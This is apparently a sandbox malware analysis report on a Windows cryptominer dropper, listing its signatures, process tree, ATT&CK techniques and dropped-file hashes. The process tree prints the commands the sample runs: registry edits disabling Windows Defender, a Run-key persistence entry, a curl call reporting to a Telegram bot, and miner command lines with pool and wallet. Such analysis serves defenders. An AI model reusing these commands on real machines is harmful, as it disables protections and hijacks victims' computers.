Analysis

  • max time kernel
    122s
  • max time network
    144s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    12-02-2022 11:00

General

  • Target

    1cf5df63590ed082bb1ff8e0e884c27be8a2a126fc4acb4ea61460ca0d3d54fe.exe

  • Size

    119KB

  • MD5

    66294a0b8c3ebd0377785a2e7fad8d9d

  • SHA1

    36034abc756afd2d7b2c8e7c0d43f4a515ed3884

  • SHA256

    1cf5df63590ed082bb1ff8e0e884c27be8a2a126fc4acb4ea61460ca0d3d54fe

  • SHA512

    8ab5a573809e230edb7ea1e8a763f0cbca8cd4a4abacb1cc909999bc81034bb26a3c3e01a6244649e458eadc673651f6cc0bd952ee476d90557b7b559337409e

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 3 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Loads dropped DLL 6 IoCs
  • Themida packer 20 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\1cf5df63590ed082bb1ff8e0e884c27be8a2a126fc4acb4ea61460ca0d3d54fe.exe
    "C:\Users\Admin\AppData\Local\Temp\1cf5df63590ed082bb1ff8e0e884c27be8a2a126fc4acb4ea61460ca0d3d54fe.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:1792
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /f /v DisableAntiSpyware /t REG_DWORD /d 1
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:520
      • C:\Windows\system32\reg.exe
        REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /f /v DisableAntiSpyware /t REG_DWORD /d 1
        3⤵
          PID:540
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:544
        • C:\Windows\system32\reg.exe
          REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection"
          3⤵
            PID:916
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /f /v DisableBehaviorMonitoring /t REG_DWORD /d 1
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1124
          • C:\Windows\system32\reg.exe
            REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /f /v DisableBehaviorMonitoring /t REG_DWORD /d 1
            3⤵
              PID:1524
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /f /v DisableOnAccessProtection /t REG_DWORD /d 1
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:832
            • C:\Windows\system32\reg.exe
              REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /f /v DisableOnAccessProtection /t REG_DWORD /d 1
              3⤵
                PID:1544
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /f /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:740
              • C:\Windows\system32\reg.exe
                REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /f /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1
                3⤵
                  PID:292
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c curl "https://api.telegram.org/bot1765686682:AAFKW2CipVCRG2oYuHNFJMKO8RSC06ZylW8/sendMessage?chat_id=-679243704&text=%F0%9F%90%B7%20%D0%A3%20%D0%B2%D0%B0%D1%81%20%D0%BD%D0%BE%D0%B2%D1%8B%D0%B9%20%D0%B2%D0%BE%D1%80%D0%BA%D0%B5%D1%80!%0A%D0%92%D0%B8%D0%B4%D0%B5%D0%BE%D0%BA%D0%B0%D1%80%D1%82%D0%B0%3A%20Standard VGA Graphics Adapter%0A(Windows%20Defender%20has%20been%20turned%20off)"
                2⤵
                  PID:800
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c REG ADD HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v RegHost /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe -FromAutoRun"
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1832
                  • C:\Windows\system32\reg.exe
                    REG ADD HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /f /v RegHost /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe -FromAutoRun"
                    3⤵
                    • Adds Run key to start application
                    PID:1108
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip * -p"8311417383488996" -oC:\Users\Admin\AppData\Roaming\Microsoft\
                  2⤵
                  • Loads dropped DLL
                  • Suspicious use of WriteProcessMemory
                  PID:1120
                  • C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
                    C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip * -p"8311417383488996" -oC:\Users\Admin\AppData\Roaming\Microsoft\
                    3⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1716
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip * -p"9249970918899184" -oC:\Users\Admin\AppData\Roaming\Microsoft\
                  2⤵
                  • Loads dropped DLL
                  • Suspicious use of WriteProcessMemory
                  PID:2028
                  • C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
                    C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe x C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip * -p"9249970918899184" -oC:\Users\Admin\AppData\Roaming\Microsoft\
                    3⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1756
                • C:\Windows\bfsvc.exe
                  C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 966238e0d3C22B90435D92a6f01665fbf8a92a3A -coin etc -worker @EasyMiner_Bot -tt 85 -tmax 85 -clKernel 3 -mi 14
                  2⤵
                  • Checks BIOS information in registry
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  PID:1712
                • C:\Windows\explorer.exe
                  C:\Windows\bfsvc.exe -log 0 -ftime 60 -pool eu1-etc.ethermine.org:4444 -wal 966238e0d3C22B90435D92a6f01665fbf8a92a3A -coin etc -worker @EasyMiner_Bot -tt 85 -tmax 85 -clKernel 3 -mi 14
                  2⤵
                  • Checks BIOS information in registry
                  • Loads dropped DLL
                  • Suspicious behavior: EnumeratesProcesses
                  PID:1624
                  • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                    "C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe"
                    3⤵
                    • Executes dropped EXE
                    PID:1724
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /f /v DisableAntiSpyware /t REG_DWORD /d 1
                      4⤵
                        PID:1772
                        • C:\Windows\system32\reg.exe
                          REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /f /v DisableAntiSpyware /t REG_DWORD /d 1
                          5⤵
                            PID:804
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection"
                          4⤵
                            PID:1716
                            • C:\Windows\system32\reg.exe
                              REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection"
                              5⤵
                                PID:1752

                      Network

                      MITRE ATT&CK Matrix ATT&CK v6

                      Persistence

                      Modify Existing Service

                      1
                      T1031

                      Registry Run Keys / Startup Folder

                      1
                      T1060

                      Defense Evasion

                      Modify Registry

                      3
                      T1112

                      Disabling Security Tools

                      1
                      T1089

                      Virtualization/Sandbox Evasion

                      1
                      T1497

                      Install Root Certificate

                      1
                      T1130

                      Discovery

                      Query Registry

                      2
                      T1012

                      Virtualization/Sandbox Evasion

                      1
                      T1497

                      System Information Discovery

                      1
                      T1082

                      Command and Control

                      Web Service

                      1
                      T1102

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\Users\Admin\AppData\Roaming\Microsoft\7z.dll
                        MD5

                        42336b5fc6be24babfb87699c858fb27

                        SHA1

                        38ae0db53b22d2e2f52bfdf25b14d79f8feca7aa

                        SHA256

                        b5508c1dab79939770ed9aa151b6731af075e84c34a316d36fc90388d3a7af07

                        SHA512

                        f091cb629231811b14ff7d40d8e8ad5e9e0c389f5c56679efb26e33dc189575f062f16f4e4b7e6caea4c268c07955bfb461ca6e86a16778c37d4cb833c8dc3f3

                      • C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
                        MD5

                        86e8388e83be8909d148518cf7b6e083

                        SHA1

                        4f7fdcf3abc0169b591e502842be074a5188c2c9

                        SHA256

                        4120c9e964ea7ed9f267ba921367a50f7b0895febe008a10aa91c0c69b966f17

                        SHA512

                        2d34d381aacd3ef7482e7580dd39760e09805a6bd8380776a40743018218ae18cc9c09aea2f54568f46f9ab12c9042a675c2956e9bc746ddc5afb22bb26e3c5e

                      • C:\Users\Admin\AppData\Roaming\Microsoft\7z.exe
                        MD5

                        86e8388e83be8909d148518cf7b6e083

                        SHA1

                        4f7fdcf3abc0169b591e502842be074a5188c2c9

                        SHA256

                        4120c9e964ea7ed9f267ba921367a50f7b0895febe008a10aa91c0c69b966f17

                        SHA512

                        2d34d381aacd3ef7482e7580dd39760e09805a6bd8380776a40743018218ae18cc9c09aea2f54568f46f9ab12c9042a675c2956e9bc746ddc5afb22bb26e3c5e

                      • C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.exe
                        MD5

                        31611fc40493d80f33b3dd411aaa4026

                        SHA1

                        71004f5959cae1d17caf3604b703b04ea8862316

                        SHA256

                        12814babde304defc4acc2593618637b2f505e0b12798842ce2c6f2dc368450c

                        SHA512

                        f86e5b67f8e1c90f4c7da319c87759f15f6dc349b466b5b158a0ff5e28abe824423a2a917eb48826e22f2cf414b6d114d44bf96aa7786a7b0e28ccdcc672511e

                      • C:\Users\Admin\AppData\Roaming\Microsoft\RegData_Temp.zip
                        MD5

                        14a4954f51da5cf0d996b9a61dd4c0e5

                        SHA1

                        9418d49202324ba8477f5933b7d7480e507c49b9

                        SHA256

                        885272ff3bbe2f9503a92e3746d21e3ac78ea01a1e9ff890f750b182af23a5f0

                        SHA512

                        d4c2b5b4cdb096f8eeff30e0f53dc321273a196cfadedbf003d41c7fd330bee7290d2f262ed50b1d952136136154141c71169526f5ff46e17a32f9017bfdb5cb

                      • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                        MD5

                        66294a0b8c3ebd0377785a2e7fad8d9d

                        SHA1

                        36034abc756afd2d7b2c8e7c0d43f4a515ed3884

                        SHA256

                        1cf5df63590ed082bb1ff8e0e884c27be8a2a126fc4acb4ea61460ca0d3d54fe

                        SHA512

                        8ab5a573809e230edb7ea1e8a763f0cbca8cd4a4abacb1cc909999bc81034bb26a3c3e01a6244649e458eadc673651f6cc0bd952ee476d90557b7b559337409e

                      • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                        MD5

                        66294a0b8c3ebd0377785a2e7fad8d9d

                        SHA1

                        36034abc756afd2d7b2c8e7c0d43f4a515ed3884

                        SHA256

                        1cf5df63590ed082bb1ff8e0e884c27be8a2a126fc4acb4ea61460ca0d3d54fe

                        SHA512

                        8ab5a573809e230edb7ea1e8a763f0cbca8cd4a4abacb1cc909999bc81034bb26a3c3e01a6244649e458eadc673651f6cc0bd952ee476d90557b7b559337409e

                      • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.exe
                        MD5

                        04ed50252c84264e20272d8eecbb5dfe

                        SHA1

                        dd8513a583de10c6d69f731dafe47134367ba4b0

                        SHA256

                        d8408a8cc89f9dfef7c994a822409f6bcb2dc6d8fe9af0edeb81c5347411641c

                        SHA512

                        536d148dde8feac142ca3b4a316ec3ecd76038c19d346d67cba9ae193722cd5aad890004e80fb37a56f14ff6aba25fed0f15f3845e5ce7fdbdb36612690e5f71

                      • C:\Users\Admin\AppData\Roaming\Microsoft\RegHost_Temp.zip
                        MD5

                        b58884e0aed5e1591fa72febf6dc8d47

                        SHA1

                        853e404cad2e662604497d7313ca8aa36cf4e9e1

                        SHA256

                        a9f1b987d3b1fb46c6d9ede15027f23c822967b699ce20b01f077faf6fa3e5d4

                        SHA512

                        20177c63929049ca80e8e7730858b7f33f3ee3fb76014e5e0c66ccc318747c1f434f77e1811775e13bd8d26e1a847a85cc7b09dce471525ab882da543a9dfe5c

                      • \Users\Admin\AppData\Roaming\Microsoft\7z.dll
                        MD5

                        42336b5fc6be24babfb87699c858fb27

                        SHA1

                        38ae0db53b22d2e2f52bfdf25b14d79f8feca7aa

                        SHA256

                        b5508c1dab79939770ed9aa151b6731af075e84c34a316d36fc90388d3a7af07

                        SHA512

                        f091cb629231811b14ff7d40d8e8ad5e9e0c389f5c56679efb26e33dc189575f062f16f4e4b7e6caea4c268c07955bfb461ca6e86a16778c37d4cb833c8dc3f3

                      • \Users\Admin\AppData\Roaming\Microsoft\7z.dll
                        MD5

                        42336b5fc6be24babfb87699c858fb27

                        SHA1

                        38ae0db53b22d2e2f52bfdf25b14d79f8feca7aa

                        SHA256

                        b5508c1dab79939770ed9aa151b6731af075e84c34a316d36fc90388d3a7af07

                        SHA512

                        f091cb629231811b14ff7d40d8e8ad5e9e0c389f5c56679efb26e33dc189575f062f16f4e4b7e6caea4c268c07955bfb461ca6e86a16778c37d4cb833c8dc3f3

                      • \Users\Admin\AppData\Roaming\Microsoft\7z.exe
                        MD5

                        86e8388e83be8909d148518cf7b6e083

                        SHA1

                        4f7fdcf3abc0169b591e502842be074a5188c2c9

                        SHA256

                        4120c9e964ea7ed9f267ba921367a50f7b0895febe008a10aa91c0c69b966f17

                        SHA512

                        2d34d381aacd3ef7482e7580dd39760e09805a6bd8380776a40743018218ae18cc9c09aea2f54568f46f9ab12c9042a675c2956e9bc746ddc5afb22bb26e3c5e

                      • \Users\Admin\AppData\Roaming\Microsoft\7z.exe
                        MD5

                        86e8388e83be8909d148518cf7b6e083

                        SHA1

                        4f7fdcf3abc0169b591e502842be074a5188c2c9

                        SHA256

                        4120c9e964ea7ed9f267ba921367a50f7b0895febe008a10aa91c0c69b966f17

                        SHA512

                        2d34d381aacd3ef7482e7580dd39760e09805a6bd8380776a40743018218ae18cc9c09aea2f54568f46f9ab12c9042a675c2956e9bc746ddc5afb22bb26e3c5e

                      • \Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                        MD5

                        66294a0b8c3ebd0377785a2e7fad8d9d

                        SHA1

                        36034abc756afd2d7b2c8e7c0d43f4a515ed3884

                        SHA256

                        1cf5df63590ed082bb1ff8e0e884c27be8a2a126fc4acb4ea61460ca0d3d54fe

                        SHA512

                        8ab5a573809e230edb7ea1e8a763f0cbca8cd4a4abacb1cc909999bc81034bb26a3c3e01a6244649e458eadc673651f6cc0bd952ee476d90557b7b559337409e

                      • \Users\Admin\AppData\Roaming\Microsoft\RegHost.exe
                        MD5

                        66294a0b8c3ebd0377785a2e7fad8d9d

                        SHA1

                        36034abc756afd2d7b2c8e7c0d43f4a515ed3884

                        SHA256

                        1cf5df63590ed082bb1ff8e0e884c27be8a2a126fc4acb4ea61460ca0d3d54fe

                        SHA512

                        8ab5a573809e230edb7ea1e8a763f0cbca8cd4a4abacb1cc909999bc81034bb26a3c3e01a6244649e458eadc673651f6cc0bd952ee476d90557b7b559337409e

                      • memory/1624-99-0x0000000140000000-0x00000001402AD000-memory.dmp
                        Filesize

                        2.7MB

                      • memory/1624-95-0x0000000140000000-0x00000001402AD000-memory.dmp
                        Filesize

                        2.7MB

                      • memory/1624-103-0x0000000140000000-0x00000001402AD000-memory.dmp
                        Filesize

                        2.7MB

                      • memory/1624-102-0x0000000140000000-0x00000001402AD000-memory.dmp
                        Filesize

                        2.7MB

                      • memory/1624-109-0x0000000140000000-0x00000001402AD000-memory.dmp
                        Filesize

                        2.7MB

                      • memory/1624-105-0x0000000140000000-0x00000001402AD000-memory.dmp
                        Filesize

                        2.7MB

                      • memory/1624-104-0x0000000140000000-0x00000001402AD000-memory.dmp
                        Filesize

                        2.7MB

                      • memory/1624-106-0x0000000140000000-0x00000001402AD000-memory.dmp
                        Filesize

                        2.7MB

                      • memory/1624-107-0x0000000140000000-0x00000001402AD000-memory.dmp
                        Filesize

                        2.7MB

                      • memory/1624-108-0x0000000140000000-0x00000001402AD000-memory.dmp
                        Filesize

                        2.7MB

                      • memory/1624-101-0x0000000140000000-0x00000001402AD000-memory.dmp
                        Filesize

                        2.7MB

                      • memory/1624-100-0x0000000140000000-0x00000001402AD000-memory.dmp
                        Filesize

                        2.7MB

                      • memory/1624-90-0x0000000140000000-0x00000001402AD000-memory.dmp
                        Filesize

                        2.7MB

                      • memory/1624-83-0x0000000140000000-0x00000001402AD000-memory.dmp
                        Filesize

                        2.7MB

                      • memory/1624-82-0x0000000140000000-0x00000001402AD000-memory.dmp
                        Filesize

                        2.7MB

                      • memory/1624-84-0x0000000140000000-0x00000001402AD000-memory.dmp
                        Filesize

                        2.7MB

                      • memory/1624-98-0x0000000140000000-0x00000001402AD000-memory.dmp
                        Filesize

                        2.7MB

                      • memory/1624-97-0x0000000140000000-0x00000001402AD000-memory.dmp
                        Filesize

                        2.7MB

                      • memory/1624-96-0x0000000140000000-0x00000001402AD000-memory.dmp
                        Filesize

                        2.7MB

                      • memory/1624-85-0x0000000140000000-0x00000001402AD000-memory.dmp
                        Filesize

                        2.7MB

                      • memory/1712-80-0x0000000140000000-0x0000000140AE8000-memory.dmp
                        Filesize

                        10.9MB

                      • memory/1712-79-0x0000000140000000-0x0000000140AE8000-memory.dmp
                        Filesize

                        10.9MB

                      • memory/1712-94-0x0000000140000000-0x0000000140AE8000-memory.dmp
                        Filesize

                        10.9MB

                      • memory/1712-92-0x0000000140000000-0x0000000140AE8000-memory.dmp
                        Filesize

                        10.9MB

                      • memory/1712-87-0x0000000140000000-0x0000000140AE8000-memory.dmp
                        Filesize

                        10.9MB

                      • memory/1712-88-0x0000000140000000-0x0000000140AE8000-memory.dmp
                        Filesize

                        10.9MB

                      • memory/1712-91-0x0000000140000000-0x0000000140AE8000-memory.dmp
                        Filesize

                        10.9MB

                      • memory/1712-89-0x0000000140000000-0x0000000140AE8000-memory.dmp
                        Filesize

                        10.9MB

                      • memory/1712-65-0x0000000140000000-0x0000000140AE8000-memory.dmp
                        Filesize

                        10.9MB

                      • memory/1712-69-0x0000000140000000-0x0000000140AE8000-memory.dmp
                        Filesize

                        10.9MB

                      • memory/1712-70-0x0000000140000000-0x0000000140AE8000-memory.dmp
                        Filesize

                        10.9MB

                      • memory/1712-93-0x0000000140000000-0x0000000140AE8000-memory.dmp
                        Filesize

                        10.9MB

                      • memory/1712-78-0x0000000140000000-0x0000000140AE8000-memory.dmp
                        Filesize

                        10.9MB

                      • memory/1712-77-0x0000000140000000-0x0000000140AE8000-memory.dmp
                        Filesize

                        10.9MB

                      • memory/1712-76-0x0000000140000000-0x0000000140AE8000-memory.dmp
                        Filesize

                        10.9MB

                      • memory/1712-75-0x0000000140000000-0x0000000140AE8000-memory.dmp
                        Filesize

                        10.9MB

                      • memory/1712-74-0x0000000140000000-0x0000000140AE8000-memory.dmp
                        Filesize

                        10.9MB

                      • memory/1712-73-0x0000000140000000-0x0000000140AE8000-memory.dmp
                        Filesize

                        10.9MB

                      • memory/1712-72-0x0000000140000000-0x0000000140AE8000-memory.dmp
                        Filesize

                        10.9MB

                      • memory/1712-71-0x0000000140000000-0x0000000140AE8000-memory.dmp
                        Filesize

                        10.9MB

                      • memory/1712-68-0x0000000140000000-0x0000000140AE8000-memory.dmp
                        Filesize

                        10.9MB

                      • memory/1712-67-0x0000000140000000-0x0000000140AE8000-memory.dmp
                        Filesize

                        10.9MB

                      • memory/1712-66-0x0000000140000000-0x0000000140AE8000-memory.dmp
                        Filesize

                        10.9MB

                      • memory/1792-54-0x000007FEFB571000-0x000007FEFB573000-memory.dmp
                        Filesize

                        8KB